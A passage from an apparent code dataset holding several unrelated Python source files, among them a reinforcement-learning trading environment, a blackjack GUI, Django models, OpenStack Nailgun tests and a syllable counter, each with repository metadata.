amount_asset_to_sell = self._get_trade(action)\n\n asset_bought, asset_sold, purchase_cost, sale_revenue = self.trade_strategy.trade(buy_amount=amount_asset_to_buy,\n sell_amount=amount_asset_to_sell,\n balance=self.balance,\n asset_held=self.asset_held,\n current_price=self._current_price)\n\n if asset_bought:\n self.asset_held += asset_bought\n self.balance -= purchase_cost\n\n self.trades.append({'step': self.current_step,\n 'amount': asset_bought,\n 'total': purchase_cost,\n 'type': 'buy'})\n elif asset_sold:\n self.asset_held -= asset_sold\n self.balance += sale_revenue\n\n self.reward_strategy.reset_reward()\n\n self.trades.append({'step': self.current_step,\n 'amount': asset_sold,\n 'total': sale_revenue,\n 'type': 'sell'})\n\n current_net_worth = round(self.balance + self.asset_held * self._current_price(), self.base_precision)\n self.net_worths.append(current_net_worth)\n self.account_history = self.account_history.append({\n 'balance': self.balance,\n 'asset_held': self.asset_held,\n 'asset_bought': asset_bought,\n 'purchase_cost': purchase_cost,\n 'asset_sold': asset_sold,\n 'sale_revenue': sale_revenue,\n }, ignore_index=True)\n\n def _done(self):\n lost_90_percent_net_worth = float(self.net_worths[-1]) < (self.initial_balance / 10)\n has_next_frame = self.data_provider.has_next_ohlcv()\n\n return lost_90_percent_net_worth or not has_next_frame\n\n def _reward(self):\n reward = self.reward_strategy.get_reward(current_step=self.current_step,\n current_price=self._current_price,\n observations=self.observations,\n account_history=self.account_history,\n net_worths=self.net_worths)\n\n reward = float(reward) if np.isfinite(float(reward)) else 0\n\n self.rewards.append(reward)\n\n if self.stationarize_rewards:\n rewards = difference(self.rewards, inplace=False)\n else:\n rewards = self.rewards\n\n if self.normalize_rewards:\n mean_normalize(rewards, inplace=True)\n\n rewards = np.array(rewards).flatten()\n\n return float(rewards[-1])\n\n def _next_observation(self):\n self.current_ohlcv = self.data_provider.next_ohlcv()\n self.timestamps.append(pd.to_datetime(self.current_ohlcv.Date.item(), unit='s'))\n self.observations = self.observations.append(self.current_ohlcv, ignore_index=True)\n\n if self.stationarize_obs:\n observations = log_and_difference(self.observations, inplace=False)\n else:\n observations = self.observations\n\n if self.normalize_obs:\n observations = max_min_normalize(observations)\n\n obs = observations.values[-1]\n\n if 
self.stationarize_obs:\n scaled_history = log_and_difference(self.account_history, inplace=False)\n else:\n scaled_history = self.account_history\n\n if self.normalize_obs:\n scaled_history = max_min_normalize(scaled_history, inplace=False)\n\n obs = np.insert(obs, len(obs), scaled_history.values[-1], axis=0)\n\n obs = np.reshape(obs.astype('float16'), self.obs_shape)\n obs[np.bitwise_not(np.isfinite(obs))] = 0\n\n return obs\n\n def reset(self):\n self.data_provider.reset_ohlcv_index()\n\n self.balance = self.initial_balance\n self.net_worths = [self.initial_balance]\n self.timestamps = []\n self.asset_held = 0\n self.current_step = 0\n\n self.reward_strategy.reset_reward()\n\n self.account_history = pd.DataFrame([{\n 'balance': self.balance,\n 'asset_held': self.asset_held,\n 'asset_bought': 0,\n 'purchase_cost': 0,\n 'asset_sold': 0,\n 'sale_revenue': 0,\n }])\n self.trades = []\n self.rewards = [0]\n\n return self._next_observation()\n\n def step(self, action):\n self._take_action(action)\n\n self.current_step += 1\n\n obs = self._next_observation()\n reward = self._reward()\n done = self._done()\n\n return obs, reward, done, {'net_worths': self.net_worths, 'timestamps': self.timestamps}\n\n def render(self, mode='human'):\n if mode == 'system':\n self.logger.info('Price: ' + str(self._current_price()))\n self.logger.info('Bought: ' + str(self.account_history['asset_bought'][self.current_step]))\n self.logger.info('Sold: ' + str(self.account_history['asset_sold'][self.current_step]))\n self.logger.info('Net worth: ' + str(self.net_worths[-1]))\n\n elif mode == 'human':\n if self.viewer is None:\n self.viewer = TradingChart(self.data_provider.data_frame)\n\n self.viewer.render(self.current_step,\n self.net_worths,\n self.render_benchmarks,\n self.trades)\n\n def close(self):\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n","repo_name":"notadamking/RLTrader","sub_path":"lib/env/TradingEnv.py","file_name":"TradingEnv.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","stars":1669,"dataset":"github-code","pt":"31"} +{"seq_id":"29136528462","text":"from conf import *\nfrom play import Player\nfrom game_logic import *\n\nclass LoginGui(Frame):\n \"\"\"Login Frame\"\"\"\n def __init__(self, master):\n super().__init__(master, height = 700, width = 700)\n master.geometry('600x600')\n self.master = master\n self.pack()\n self.create_widgets()\n\n def create_widgets(self):\n image = Image.open(\"./game_img/casino_bg.gif\")\n self.imageP = ImageTk.PhotoImage(image)\n l = Label(self, image=self.imageP)\n l.image = self.imageP\n l.place(x = 0, y = 0)\n self.title = Label(self, text=\"Welcome to BlackJack Board!\", font = (\"Times\", \"30\"), bg = \"black\", fg = \"white\")\n self.title.place(x=130,y=200)\n self.name = Label(self, text=\"Name\", font = (\"Times\", \"24\"), bg = \"black\" ,fg = \"white\")\n self.name.place(x=110,y=260)\n self.login_entry = Entry(self, width=20, bg = \"black\", fg = \"white\", highlightbackground = \"black\")\n self.login_entry.place(x=210,y=265)\n self.login_photo = PhotoImage(file = \"./game_img/login.gif\")\n self.button_login = Button(self, image = self.login_photo ,command = self.game_login, highlightbackground = \"black\")\n self.button_login.place(x=440,y=260)\n self.summary_window = Text(self, width = 25, height = 6, wrap = WORD, bg = \"black\", fg = \"white\", font = (\"Times\", \"20\"))\n self.summary_window.place(x=180,y=310)\n self.start_photo = PhotoImage(file = 
\"./game_img/start.gif\")\n self.button_play = Button(self, image = self. start_photo , command = self.game_start, highlightbackground = \"black\")\n self.button_play.place(x=75,y=500)\n\n def game_login(self):\n Player.name = self.login_entry.get()\n _, tries, wins, chips = View.get_record(Player.name)\n self.__tries = tries\n record = \"Name : \" + Player.name + \"\\n\"\n record += \"Game Tries : \" + str(tries) + \"\\n\"\n record += \"Win Games : \"+ str(wins) + \"\\n\"\n if tries == 0:\n record += \"Winning Rate : 0.0\" + \"\\n\"\n else:\n record += \"Winning Rate : \" + str(round((wins/tries)*100,2)) + \"\\n\"\n record += \"Chips : \" + str(chips)\n self.summary_window.insert(0.0, record)\n self.name.destroy()\n self.login_entry.destroy()\n self.button_login.destroy()\n\n def game_start(self):\n self.__tries+=1\n self.destroy()\n Game(self.master)","repo_name":"sonhl0723/blackjack-game","sub_path":"login_gui.py","file_name":"login_gui.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37772709070","text":"# https://www.codewars.com/kata/54d512e62a5e54c96200019e/solutions/python\n\ndef prime_factors(n):\n i = 2\n factors = {}\n\n while (i * i) <= n:\n if (n % i) == 0:\n factors.setdefault(i, 0)\n factors[i] += 1\n n //= i\n else:\n i += 1\n\n if n > 1:\n factors.setdefault(n, 0)\n factors[n] += 1\n\n res = ''\n\n for key in factors:\n if factors[key] == 1:\n res += f'({key})'\n else:\n res += f'({key}**{factors[key]})'\n return res\n\n","repo_name":"mlsimpson/codewars","sub_path":"5kyu/primes_in_numbers.py","file_name":"primes_in_numbers.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40125573885","text":"#!/usr/bin/env python\n\n\"\"\"This module contains code to work with soundcloud.\"\"\"\n\nimport json\nimport re\n\nimport requests\n\nfrom downspout import settings, utils\n\n\n# fetch all artist media at url, which has\n# the format https://soundcloud.com/username\ndef soundcloud_fetch_metadata(artist):\n url = '{0}/{1}'.format(settings.SOUNDCLOUD_FRONT_URL, artist)\n safe_artist = utils.safe_filename(artist)\n api = settings.SOUNDCLOUD_RESOLVE_API.format(url, settings.SOUNDCLOUD_CLIENT_ID)\n metadata = utils.tree()\n\n resolver = requests.get(api)\n print(\"Resolver: {}\".format(resolver))\n\n tracks = []\n try:\n user = resolver.json()['username']\n user_id = resolver.json()['id']\n track_count = int(resolver.json()['track_count'])\n track_api = settings.SOUNDCLOUD_TRACK_API.format(user_id, settings.SOUNDCLOUD_CLIENT_ID)\n tracks = requests.get(track_api).json()\n print(\"Got tracks...{}\".format(tracks))\n except:\n pass\n\n track_number = 0\n for track in tracks:\n track_number = track_number + 1\n try:\n waveform_url = track['waveform_url']\n regex = re.compile(\"\\/([a-zA-Z0-9]+)_\")\n r = regex.search(waveform_url)\n stream_id = r.groups()[0]\n\n metadata[artist]['tracks'][track['title']]['url'] = settings.SOUNDCLOUD_MEDIA_URL.format(stream_id)\n metadata[artist]['tracks'][track['title']]['album'] = ''\n metadata[artist]['tracks'][track['title']]['encoding'] = 'mp3'\n metadata[artist]['tracks'][track['title']]['duration'] = None\n metadata[artist]['tracks'][track['title']]['track_number'] = track_number\n metadata[artist]['tracks'][track['title']]['license'] = 'unknown'\n track_filename = track['track_num'] + '-' if 'track_num' in track else ''\n track_filename = 
track_filename + utils.safe_filename(track['title']) + '.mp3'\n metadata[artist]['tracks'][track['title']]['track_filename'] = track_filename\n track_folder = \"{0}/{1}\".format(\n settings.MEDIA_FOLDER, safe_artist)\n metadata[artist]['tracks'][track['title']]['track_folder'] = track_folder\n\n except:\n pass\n\n return metadata\n","repo_name":"ajduncan/downspout","sub_path":"downspout/soundcloud.py","file_name":"soundcloud.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16246524591","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def bstFromPreorder(self, preorder: List[int]) -> Optional[TreeNode]:\n root = TreeNode(preorder[0])\n stack = [root]\n \n for i in range(1, len(preorder)):\n cur = TreeNode(preorder[i])\n if cur.val < stack[-1].val:\n stack[-1].left = cur\n \n else:\n prev = None\n while stack:\n prev = stack.pop()\n \n if stack and stack[-1].val > cur.val:\n break\n \n prev.right = cur\n \n stack.append(cur)\n \n return root","repo_name":"AmanuelD02/Competitive-Programming","sub_path":"1008-construct-binary-search-tree-from-preorder-traversal/1008-construct-binary-search-tree-from-preorder-traversal.py","file_name":"1008-construct-binary-search-tree-from-preorder-traversal.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43473814365","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\n\nfrom django.contrib.postgres.fields import JSONField\n\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nclass Timestamp(models.Model):\n\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n\nclass Profile(Timestamp):\n\n USER_GENDER_CHOICES = (\n (\"None\", \"None selected\"),\n (\"Male\", \"Male\"),\n (\"Female\", \"Female\"),\n (\"Not_of_this_earth\", \"Not of this Earth\"),\n (\"Nunna_yo_biznizz\", \"Nunna yo biznizz!\"),\n )\n\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n fb_id = models.CharField(max_length=255, blank=True)\n profile_pic = models.CharField(max_length=255, blank=True)\n locale = models.CharField(max_length=48, blank=True)\n timezone = models.IntegerField(default='+8')\n location = models.CharField(max_length=255, blank=True)\n slug = models.SlugField(max_length=255, blank=True)\n score = models.IntegerField(default=0)\n bio = models.CharField(max_length=255, blank=True)\n email_confirmed = models.BooleanField(default=False)\n private = models.BooleanField(default=False)\n gender = models.CharField(\n max_length=128,\n blank=True,\n default='None',\n choices=USER_GENDER_CHOICES,\n )\n\n class Meta:\n managed = False\n db_table = 'common_profile'\n\n\n@receiver(post_save, sender=User)\ndef update_user_profile(sender, instance, created, **kwargs):\n print(\"POST SAVE\", sender, instance, created)\n print(\"POST SAVE KWARGS\", kwargs)\n if created:\n profile = Profile.objects.create(user=instance)\n profile.save()\n\n\nclass CelebModel(Timestamp):\n name = models.CharField(max_length=255)\n 
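# NOTE: the JSONField columns declared further below come from\n    # django.contrib.postgres.fields, so this model assumes a PostgreSQL backend.\n    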
profile = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name='linked_profile'\n )\n ig_handle = models.CharField(max_length=255, blank=True)\n slug = models.SlugField(max_length=255, blank=True)\n link = models.CharField(max_length=255, blank=True)\n followers = models.IntegerField(default=0)\n profile_pic = models.CharField(max_length=255, blank=True)\n score = models.IntegerField(default=0)\n tag_list = JSONField(blank=True, null=True)\n interests_list = JSONField(blank=True, null=True)\n concepts_list = JSONField(blank=True, null=True)\n word_set = JSONField(blank=True, null=True)\n last_scraped = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'influencers_celebrity'\n","repo_name":"MichaelLisboa/instagram-drf-python-social_auth-react","sub_path":"backend/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"21615939607","text":"import torch\nimport pandas as pd\n\ndef detec_son(path_imagen):\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='.\\\\src\\\\pesos\\\\best.pt', force_reload=True) \n # Image\\\n img = path_imagen\n # Inference\n model.conf = 0.6\n results = model(img)\n # Results, change the flowing to: results.show()\n results.save()\n print(results) # or .show(), .save(), .crop(), .pandas(), etc\n #results.pandas()\n indicador=1\n return","repo_name":"JuanEncizo/Landing_Page","sub_path":"src/app_detect.py","file_name":"app_detect.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34615972458","text":"from datetime import datetime\n\nfrom django.test import TestCase\nfrom django.urls.base import reverse\nfrom django.utils import timezone\n\nfrom .models import Feed\n\n\nclass RssTests(TestCase):\n def setUp(self):\n self.feed = Feed.objects.create(\n name=\"Lobsters\",\n title=\"ZFS Woes, or how ZFS Saved Me From Data Corruption\",\n description=\"so much to tell\",\n link=\"https://battlepenguin.com/tech/zfs-woes-or-how-zfs-saved-me-from-data-corruption\",\n pub_date=timezone.now(),\n image=\"https://image.myawesomeshow.com\",\n )\n\n def test_feed_content(self):\n self.assertEqual(self.feed.name, \"Lobsters\")\n self.assertEqual(self.feed.title, \"ZFS Woes, or how ZFS Saved Me From Data Corruption\")\n self.assertEqual(self.feed.description, \"so much to tell\")\n self.assertEqual(\n self.feed.link, \"https://battlepenguin.com/tech/zfs-woes-or-how-zfs-saved-me-from-data-corruption\"\n )\n self.assertEqual(self.feed.image, \"https://image.myawesomeshow.com\")\n\n def test_episode_str_representation(self):\n self.assertEqual(str(self.feed), \"Lobsters: ZFS Woes, or how ZFS Saved Me From Data Corruption\")\n\n def test_home_page_status_code(self):\n response = self.client.get(\"/\")\n self.assertEqual(response.status_code, 200)\n\n def test_home_page_uses_correct_template(self):\n response = self.client.get(reverse(\"homepage\"))\n self.assertTemplateUsed(response, \"homepage.html\")\n\n def test_homepage_list_contents(self):\n response = self.client.get(reverse(\"homepage\"))\n self.assertContains(\n response,\n \"ZFS Woes, or how ZFS Saved Me From Data Corruption\",\n 
)\n","repo_name":"miccaldas/old_alternative_projects","sub_path":"django/django_rss/rss/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"17109234657","text":"import pytest\n\nfrom searching import search\n\nclass Test_binary:\n    @pytest.mark.parametrize('searchlist,item,expected', [([1,3,5,6,7],3,1),([3,4,16,23,40],40,4),([9,10,11,12,13,14],15,-1)])\n    def test_binary_finds_unique_element_in_sorted_list(self,searchlist,item,expected):\n        i = search.binary(searchlist,item)\n        assert i == expected\n\nclass Test_linear:\n    @pytest.mark.parametrize('searchlist,item,find,expected', [([1,3,5,6,7],3,'first',1),([3,4,16,23,40],40,'first',4),([9,10,11,12,13,14],15,'first',-1)])\n    def test_linear_finds_element_in_sorted_list(self,searchlist,item,find,expected):\n        i = search.linear(searchlist,item,find)\n        assert i == expected","repo_name":"wolfnfox/Code-Snippets","sub_path":"Python Snippets/tests/searching_tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"71091682649","text":"\nimport ddbutils\nimport httputils\nimport datautils\n\n\n# Register a terminal name\ndef main(event, context):\n    print('event:', event)\n    queryStringParameters = event.get('queryStringParameters')\n    if queryStringParameters is None:\n        return httputils.return400()\n    terminal_id = queryStringParameters.get('terminal_id', 'anonymous')\n    app_id = queryStringParameters.get('app_id', 'anonymous')\n    name = queryStringParameters.get('name', 'anonymous')\n    if app_id == 'vrc':\n        # Prepend the source IP address as a prefix\n        terminal_id = event.get('requestContext').get('identity').get('sourceIp') + '_' + terminal_id\n    else:\n        # Anything other than VRC is rejected, for now\n        return httputils.return400()\n    # Is the terminal already registered?\n    terminal = ddbutils.get_terminal(terminal_id)\n    if terminal is None:\n        # Not registered yet, so register it\n        print('regist_terminal', terminal_id, name)\n        ddbutils.regist_terminal(terminal_id, ddbutils.makeTTLdays(24), name, datautils.STATUS_STANDBY)\n    else:\n        # Already registered, so update the stored name\n        print('update_terminal_name', terminal_id, name)\n        ddbutils.update_terminal_name(terminal_id, name)\n    return httputils.return200()\n","repo_name":"aki-lua87/rv_vs_server","sub_path":"src/lambda/rv_terminal_regist/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"6080780561","text":"import yaml\n\nfrom oslo_serialization import jsonutils\n\nfrom nailgun.db.sqlalchemy.models import NodeBondInterface\n\nfrom nailgun.test.base import BaseIntegrationTest\nfrom nailgun.utils import reverse\n\n\nclass TestAssignmentHandlers(BaseIntegrationTest):\n    def _assign_roles(self, assignment_data, expect_errors=False):\n        return self.app.post(\n            reverse(\n                'NodeAssignmentHandler',\n                kwargs={'cluster_id': self.cluster.id}\n            ),\n            jsonutils.dumps(assignment_data),\n            headers=self.default_headers,\n            expect_errors=expect_errors\n        )\n\n    def test_assignment(self):\n        self.env.create(\n            cluster_kwargs={\"api\": True},\n            nodes_kwargs=[\n                {\n                    \"cluster_id\": None,\n                    \"api\": True\n                }\n            ]\n        )\n        self.cluster = self.env.clusters[0]\n        node = self.env.nodes[0]\n        assignment_data = [\n            {\n                \"id\": node.id,\n                \"roles\": ['controller']\n            }\n        ]\n        resp = self._assign_roles(assignment_data)\n        self.assertEqual(200, resp.status_code)\n        
self.assertEqual(node.cluster, self.cluster)\n self.datadiff(\n node.pending_roles,\n assignment_data[0][\"roles\"]\n )\n\n resp = self._assign_roles(assignment_data, True)\n self.assertEqual(400, resp.status_code)\n\n def test_unassignment(self):\n cluster = self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[{}]\n )\n node = self.env.nodes[0]\n # correct unassignment\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers\n )\n self.assertEqual(200, resp.status_code)\n self.assertEqual(node.cluster, None)\n self.assertEqual(node.pending_roles, [])\n\n #Test with invalid node ids\n for node_id in (0, node.id + 50):\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node_id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(400, resp.status_code)\n #Test with invalid cluster id\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id'] + 5}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(resp.status_code, 404)\n\n # Test with wrong cluster id\n self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[{}]\n )\n\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': self.env.clusters[1].nodes[0].id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(resp.status_code, 400)\n\n def test_unassignment_after_deploy(self):\n cluster = self.env.create(\n nodes_kwargs=[{}]\n )\n node = self.env.nodes[0]\n node.status = 'error'\n self.db.commit()\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers\n )\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(node.pending_deletion, True)\n\n def test_assigment_with_invalid_cluster(self):\n node = self.env.create_node(api=False)\n\n resp = self.app.post(\n reverse(\n 'NodeAssignmentHandler',\n kwargs={'cluster_id': '9999'}\n ),\n jsonutils.dumps([{\n 'id': node.id,\n 'roles': ['controller']\n }]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEquals(404, resp.status_code)\n\n def test_assign_conflicting_roles(self):\n self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[\n {\n \"cluster_id\": None,\n \"api\": True\n }\n ]\n )\n self.cluster = self.env.clusters[0]\n node = self.env.nodes[0]\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller', 'compute']\n }\n ]\n resp = self._assign_roles(assignment_data, True)\n self.assertEquals(400, resp.status_code)\n\n def test_assign_conflicting_all_role(self):\n ROLE = yaml.safe_load(\"\"\"\n name: test_role\n meta:\n name: \"Some plugin role\"\n description: \"Some description\"\n conflicts: \"*\"\n volumes_roles_mapping:\n - id: os\n allocate_size: all\n \"\"\")\n\n release = self.env.create_release()\n resp = self.env.create_role(release.id, ROLE)\n\n self.env.create(\n cluster_kwargs={\n \"api\": True,\n \"release_id\": release.id\n },\n nodes_kwargs=[\n {\n \"cluster_id\": None,\n \"api\": True\n }\n ]\n )\n self.cluster = self.env.clusters[0]\n node = self.env.nodes[0]\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller', 'test_role']\n 
}\n ]\n resp = self._assign_roles(assignment_data, True)\n self.assertEquals(400, resp.status_code, resp.body)\n\n assignment_data[0][\"roles\"] = ['test_role']\n resp = self._assign_roles(assignment_data)\n self.assertEquals(200, resp.status_code, resp.body)\n\n def test_add_node_with_cluster_network_template(self):\n net_template = {\n \"adv_net_template\": {\n \"default\": {\n \"network_assignments\": {\n \"management\": {\n \"ep\": \"br-mgmt\"\n },\n \"storage\": {\n \"ep\": \"br-storage\"\n },\n \"public\": {\n \"ep\": \"br-ex\"\n },\n \"private\": {\n \"ep\": \"br-prv\"\n },\n \"fuelweb_admin\": {\n \"ep\": \"br-fw-admin\"\n }\n },\n \"templates_for_node_role\": {\n \"controller\": [\n \"common\"\n ]\n },\n \"nic_mapping\": {\n \"default\": {\n \"if4\": \"eth3\",\n \"if1\": \"eth0\",\n \"if2\": \"eth1\",\n \"if3\": \"eth2\"\n }\n },\n \"network_scheme\": {\n \"common\": {\n \"endpoints\": [\n \"br-mgmt\"\n ],\n \"transformations\": [\n {\n \"action\": \"add-br\",\n \"name\": \"br-mgmt\"\n },\n {\n \"action\": \"add-port\",\n \"bridge\": \"br-mgmt\",\n \"name\": \"<% if2 %>\"\n }\n ],\n \"roles\": {\n \"management\": \"br-mgmt\"\n }\n }\n }\n }\n }\n }\n\n cluster = self.env.create_cluster(api=False)\n cluster.network_config.configuration_template = net_template\n\n node = self.env.create_node()\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller']\n }\n ]\n self.app.post(\n reverse(\n 'NodeAssignmentHandler',\n kwargs={'cluster_id': cluster.id}\n ),\n jsonutils.dumps(assignment_data),\n headers=self.default_headers\n )\n net_scheme = node.network_template['templates']['common']\n self.assertNotEqual({}, node.network_template)\n self.assertEquals(['br-mgmt'], net_scheme['endpoints'])\n self.assertEquals({'management': 'br-mgmt'}, net_scheme['roles'])\n\n # The order of transformations matters\n self.assertIn('add-br', net_scheme['transformations'][0].values())\n self.assertIn('add-port', net_scheme['transformations'][1].values())\n self.assertEquals('eth1', net_scheme['transformations'][1]['name'])\n\n\nclass TestClusterStateUnassignment(BaseIntegrationTest):\n\n def test_delete_bond_and_networks_state_on_unassignment(self):\n \"\"\"Test verifies that\n 1. bond configuration will be deleted\n 2. 
networks are unassigned from the node's interfaces\n        when a node is unassigned from a cluster\n        \"\"\"\n        cluster = self.env.create(\n            nodes_kwargs=[{}]\n        )\n        node = self.env.nodes[0]\n        node.bond_interfaces.append(\n            NodeBondInterface(name='ovs-bond0',\n                              slaves=node.nic_interfaces))\n        self.db.flush()\n        resp = self.app.post(\n            reverse(\n                'NodeUnassignmentHandler',\n                kwargs={'cluster_id': cluster['id']}\n            ),\n            jsonutils.dumps([{'id': node.id}]),\n            headers=self.default_headers\n        )\n\n        self.assertEqual(resp.status_code, 200)\n        self.assertEqual(node.bond_interfaces, [])\n        for interface in node.interfaces:\n            self.assertEqual(interface.assigned_networks_list, [])\n","repo_name":"thomasgoirand/fuel-nailgun","sub_path":"nailgun/test/unit/test_node_assignment_handler.py","file_name":"test_node_assignment_handler.py","file_ext":"py","file_size_in_byte":10642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"29431207370","text":"BLACK = bytes.fromhex(\"00 00 00\")\n\n_BAD_COLOR_VALUE_ERROR_MSG = (\"Colors are expected to be a bytes object of \"\n                            \"length three (3) specifying the r,g and b \"\n                            \"components of the color in that order\")\n_BAD_DURATION_VALUE_ERROR_MSG = (\"Duration is expected to be an unsigned \"\n                                \"integer\")\n_BAD_FLASHES_VALUE_ERROR_MSG = \"Flashes is expected to be an unsigned integer\"\n\nclass AbstractController:\n    '''\n    Define the interface for portal box display controllers\n\n    PortalBox.py expects controllers to implement the interface exposed by\n    AbstractController. Therefore concrete Controller classes, ones that\n    interface with real hardware, should subclass AbstractController\n    '''\n\n    def __init__(self, settings = {}):\n        '''\n        Use the optional settings to configure the display\n\n        Caller will pass a dict (ConfigParser.SectionProxy) initialized from\n        the 'display' section of the config file. A ValueError should be raised
A ValueError should be raised\n if a required key is missing though sane defaults should be used if\n possible so that settings is optional.\n '''\n self.is_sleeping = False\n\n\n def sleep_display(self):\n '''\n Start a display sleeping animation\n '''\n self.is_sleeping = True\n\n\n def wake_display(self):\n '''\n End a box sleeping animation\n '''\n self.is_sleeping = False\n\n\n def set_display_color(self, color = BLACK):\n '''\n Set the entire strip to specified color.\n @param (unsigned integer) color - the color to set defaults to LED's off\n '''\n if type(color) is not bytes or 3 != len(color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n\n def set_display_color_wipe(self, color, duration):\n '''\n Set the entire strip to specified color using a \"wipe\" effect.\n @param (unsigned integer) color - the color to set\n @param (int) duration - how long the effect is to take\n '''\n if type(color) is not bytes or 3 != len(color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n if type(duration) is not int or 0 > duration:\n raise ValueError(_BAD_DURATION_VALUE_ERROR_MSG)\n\n\n def flash_display(self, flash_color, duration, flashes=5, end_color = BLACK):\n \"\"\"Flash color across all display pixels multiple times.\"\"\"\n if type(flash_color) is not bytes or 3 != len(flash_color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n if type(duration) is not int or 0 > duration:\n raise ValueError(_BAD_DURATION_VALUE_ERROR_MSG)\n\n if type(flashes) is not int or 0 > flashes:\n raise ValueError(_BAD_FLASHES_VALUE_ERROR_MSG)\n\n if type(end_color) is not bytes or 3 != len(end_color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n","repo_name":"Bucknell-ECE/PortalBox-application","sub_path":"portalbox/display/AbstractController.py","file_name":"AbstractController.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9343511151","text":"\"\"\"\nFallback syllable counter\n\nThis is based on the algorithm in Greg Fast's perl module\nLingua::EN::Syllable.\n\"\"\"\n\nimport string, re, os\n\nspecialSyllables_en = \"\"\"tottered 2\nchummed 1\npeeped 1\nmoustaches 2\nshamefully 3\nmessieurs 2\nsatiated 4\nsailmaker 4\nsheered 1\ndisinterred 3\npropitiatory 6\nbepatched 2\nparticularized 5\ncaressed 2\ntrespassed 2\nsepulchre 3\nflapped 1\nhemispheres 3\npencilled 2\nmotioned 2\npoleman 2\nslandered 2\nsombre 2\netc 4\nsidespring 2\nmimes 1\neffaces 2\nmr 2\nmrs 2\nms 1\ndr 2\nst 1\nsr 2\njr 2\ntruckle 2\nfoamed 1\nfringed 2\nclattered 2\ncapered 2\nmangroves 2\nsuavely 2\nreclined 2\nbrutes 1\neffaced 2\nquivered 2\nh'm 1\nveriest 3\nsententiously 4\ndeafened 2\nmanoeuvred 3\nunstained 2\ngaped 1\nstammered 2\nshivered 2\ndiscoloured 3\ngravesend 2\n60 2\nlb 1\nunexpressed 3\ngreyish 2\nunostentatious 5\n\"\"\"\n\nfallback_cache = {}\n\nfallback_subsyl = [\"cial\", \"tia\", \"cius\", \"cious\", \"gui\", \"ion\", \"iou\",\n \"sia$\", \".ely$\"]\n\nfallback_addsyl = [\"ia\", \"riet\", \"dien\", \"iu\", \"io\", \"ii\",\n \"[aeiouy]bl$\", \"mbl$\",\n \"[aeiou]{3}\",\n \"^mc\", \"ism$\",\n \"(.)(?!\\\\1)([aeiouy])\\\\2l$\",\n \"[^l]llien\",\n \"^coad.\", \"^coag.\", \"^coal.\", \"^coax.\",\n 